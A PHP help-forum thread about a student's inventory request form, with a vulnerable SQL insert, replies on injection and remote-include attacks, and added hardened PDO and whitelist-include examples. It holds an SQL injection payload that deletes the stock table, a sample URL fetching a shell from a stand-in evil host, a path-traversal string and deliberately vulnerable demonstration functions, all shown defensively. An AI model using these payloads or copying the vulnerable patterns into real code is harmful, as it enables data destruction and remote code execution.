This semester I'm doing my final year project. I'm doing an inventory stationery system. My problem now is I want to submit the user request but it doesn't work yet. There is no error, but the data doesn't get inserted into the database. I'm using Dreamweaver and XAMPP as my database server. In my request, the form will carry the user ID, stock ID and stock quantity the user needs. Then when the user sends the request, the database will subtract the requested stock from the original stock. Here is my code.
This is my sendreq.php file:
<?php session_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="inventory"; // Database name
$tbl_name="request"; // Table name
include 'dbconnect.php';
// Connect to server and select database.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
//$hide_user_id = $_POST ['hide_user_id'];
//$hide_stock_id = $_POST ['hide_stock_id'];
$user_id=$_POST['user_id'];
$stock_id=$_POST['stock_id'];
$stock_req=$_POST['stock_req'];
$sql="INSERT INTO request (user_id, stock_id,stock_req)
VALUES ('$_POST[user_id]', '$_POST[stock_id]', '$_POST[stock_req]')";
$result=mysql_query("SELECT stock_id FROM stock WHERE stock_id=stock_id2");
$stock_balance=$row[stock_q]-$stock_req;
if($stock_balance<0)
$stock_q-$stock_req;
$total=$stock_q-stock_req;
return $total;
// close connection
mysql_close();
?>
Hope anyone can help me very soon... Anyway, thank you.
Hi,
I'm sure that you do not use Dev-PHP.
I believe that you should use it.
Its syntax highlighter shows some obvious errors.
You will love our contextual help.
(You may need to download the PHP documentation.)
For example, place the caret over "mysql_connect",
then press <F1>.
This will bring you valuable information.
Same results with "mysql_select_db".
I suggest that you think about the meaning of
the following statement:
> $sql='insert into table values(1,2,3)';
There is no syntax error, but what does it mean?
Same question about
> $stock_q-$stock_req;
Which result could be obtained here:
> $result=mysql_query("SELECT stock_id FROM stock WHERE stock_id=stock_id2");
After having checked the value returned into $result,
you could also consider using something like
$row = mysql_fetch_assoc($result)
Of course, the value returned into $row must be checked.
You do not check the contents of variables.
This is a security hole.
Imagine what could happen if the user enters the
following text into the form as the value for 'stock_req':
'); delete from stock; --
My two cents,
Pierre.
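One way to close both the logic holes and the injection hole Pierre points out, as an added example that is not part of the original thread: the handler rewritten with PDO prepared statements and a conditional UPDATE, so the stock decrement happens atomically on the server instead of in PHP after a SELECT. The table layout (a `stock_q` column on `stock`, an auto-increment id on `request`) is assumed from the column names in the posted code, since the post does not show the schema. The block opens an in-memory SQLite database so it can be run without XAMPP; the commented MySQL DSN is the one you would use under XAMPP. It needs PHP 7.1 or later.

```php
<?php
// Added example: hardened version of sendreq.php using PDO prepared statements.
// Runs against in-memory SQLite so it can be tried without XAMPP. For MySQL
// under XAMPP use instead:
//   new PDO('mysql:host=localhost;dbname=inventory;charset=utf8mb4', 'root', '')
// The stock_q column and the request table layout are assumptions taken from
// the column names in the original post.

function openDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Real server-side prepares: bound values are never spliced into SQL text.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    // Constructed schema and sample stock (assumed, not from the post).
    $pdo->exec('CREATE TABLE stock (stock_id INTEGER PRIMARY KEY, stock_q INTEGER NOT NULL)');
    $pdo->exec('CREATE TABLE request (id INTEGER PRIMARY KEY AUTOINCREMENT, '
             . 'user_id INTEGER NOT NULL, stock_id INTEGER NOT NULL, stock_req INTEGER NOT NULL)');
    $pdo->exec('INSERT INTO stock (stock_id, stock_q) VALUES (1, 10), (2, 3)');
    return $pdo;
}

// The vulnerable pattern from the original post, kept only to show the SQL
// text it produces. It is never executed here.
function vulnerableSql(array $post): string {
    return "INSERT INTO request (user_id, stock_id, stock_req) "
         . "VALUES ('$post[user_id]', '$post[stock_id]', '$post[stock_req]')";
}

// Hardened handler: validate types, bind parameters, decrement atomically.
// Returns the new stock balance, or null if the request could not be fulfilled.
function sendRequest(PDO $pdo, array $post): ?int {
    // Whitelist validation: every field must be a non-negative integer.
    foreach (['user_id', 'stock_id', 'stock_req'] as $f) {
        if (!isset($post[$f])
            || filter_var($post[$f], FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]) === false) {
            return null;
        }
    }
    $userId  = (int)$post['user_id'];
    $stockId = (int)$post['stock_id'];
    $req     = (int)$post['stock_req'];
    if ($req < 1) {
        return null;
    }

    $pdo->beginTransaction();
    try {
        // Conditional UPDATE: only succeeds when enough stock exists, so two
        // concurrent requests cannot both drive the balance below zero. This is
        // what the original "if($stock_balance<0)" was trying to express.
        $upd = $pdo->prepare('UPDATE stock SET stock_q = stock_q - :req '
                           . 'WHERE stock_id = :sid AND stock_q >= :req2');
        $upd->execute([':req' => $req, ':sid' => $stockId, ':req2' => $req]);
        if ($upd->rowCount() !== 1) {
            $pdo->rollBack();
            return null;                       // unknown stock_id or not enough left
        }

        $ins = $pdo->prepare('INSERT INTO request (user_id, stock_id, stock_req) '
                           . 'VALUES (:uid, :sid, :req)');
        $ins->execute([':uid' => $userId, ':sid' => $stockId, ':req' => $req]);

        $sel = $pdo->prepare('SELECT stock_q FROM stock WHERE stock_id = :sid');
        $sel->execute([':sid' => $stockId]);
        $row = $sel->fetch(PDO::FETCH_ASSOC);   // always check the fetch result
        if ($row === false) {
            $pdo->rollBack();
            return null;
        }
        $pdo->commit();
        return (int)$row['stock_q'];
    } catch (PDOException $e) {
        $pdo->rollBack();
        throw $e;
    }
}

$pdo = openDb();
$payload = "'); delete from stock; --";           // Pierre's example input

// Show what the string-built query from the post turns into.
echo vulnerableSql(['user_id' => 1, 'stock_id' => 1, 'stock_req' => $payload]), "\n";

// The same input through the hardened handler, then two normal requests.
var_dump(sendRequest($pdo, ['user_id' => 1, 'stock_id' => 1, 'stock_req' => $payload]));
var_dump(sendRequest($pdo, ['user_id' => 1, 'stock_id' => 1, 'stock_req' => '4']));
var_dump(sendRequest($pdo, ['user_id' => 1, 'stock_id' => 2, 'stock_req' => '5']));
```

Run it with `php sendreq_pdo.php`. Pierre's payload fails the integer check before any SQL is built, and even if it reached the query it would travel as a bound value, so the only statement the server ever parses is the one written in the source. The 4-unit request against stock 1 succeeds and returns the new balance; the 5-unit request against stock 2, which only has 3 units, is refused by the `stock_q >= :req2` condition and rolled back, leaving no half-written request row.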
The lazy way to fix the security hole is http://sourceforge.net/projects/evilsentinel
I use it on my own website at http://comchatter.com
It has successfully prevented remote include attacks & more.
Warning to all: simply cleaning up the variables with mysql_escape_string does not protect you from XSS & remote include attacks.
I know; my site was compromised using remote includes despite using several measures against attack.
Another security measure involves changing the server settings either via .htaccess or php.ini to disable the remote includes option.
Does anybody know of a tutorial on PHP security measures?
Hope this helps,
Ivan
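As an added illustration of the remote-include problem Ivan mentions (not code from his site or from evilsentinel): the pattern that lets a page be included from a URL, beside a whitelist version in which user input never becomes part of a filesystem path, plus a startup check of the `allow_url_include` directive. The `pages/` directory and the page names are hypothetical. The php.ini settings this relies on are `allow_url_include = Off` (the PHP default) and, where the application does not need to fetch URLs at all, `allow_url_fopen = Off`; these are server-level settings, so set them in php.ini rather than relying on escaping in application code.

```php
<?php
// Added example (not from Ivan's post): remote file inclusion pattern beside
// a whitelist replacement. The pages/ directory and page names are hypothetical.

// Vulnerable: the attacker controls the include path. With allow_url_include
// enabled, ?page=http://evil.example/shell.txt fetches and runs remote code;
// even with it disabled, ?page=../../../etc/passwd includes (and echoes) a
// local file. mysql_escape_string on $page does nothing against either.
function vulnerableInclude(string $page): void {
    include $page;
}

// Hardened: user input is only a key into a fixed map, so the path that
// reaches include() never contains attacker-controlled bytes.
const PAGES = [
    'home'    => 'pages/home.php',
    'stock'   => 'pages/stock.php',
    'request' => 'pages/request.php',
];

function safeInclude(string $page): bool {
    if (!array_key_exists($page, PAGES)) {
        return false;                        // unknown page: treat as 404
    }
    $path = __DIR__ . '/' . PAGES[$page];
    if (!is_file($path)) {
        return false;
    }
    include $path;
    return true;
}

// Defence in depth: refuse to serve at all while the server still permits
// remote includes, independent of what the application code does.
function remoteIncludesDisabled(): bool {
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (!remoteIncludesDisabled()) {
    http_response_code(500);
    exit('allow_url_include must be Off in php.ini');
}

if (!safeInclude($_GET['page'] ?? 'home')) {
    http_response_code(404);
    exit('Page not found');
}
```

The map does the work here: the request parameter is compared against three fixed keys and then discarded, so there is no path to sanitise and nothing for a traversal or URL payload to act on. The `ini_get` check is a guard against the server being deployed with the directive turned back on, which is the case Ivan's .htaccess/php.ini advice is about.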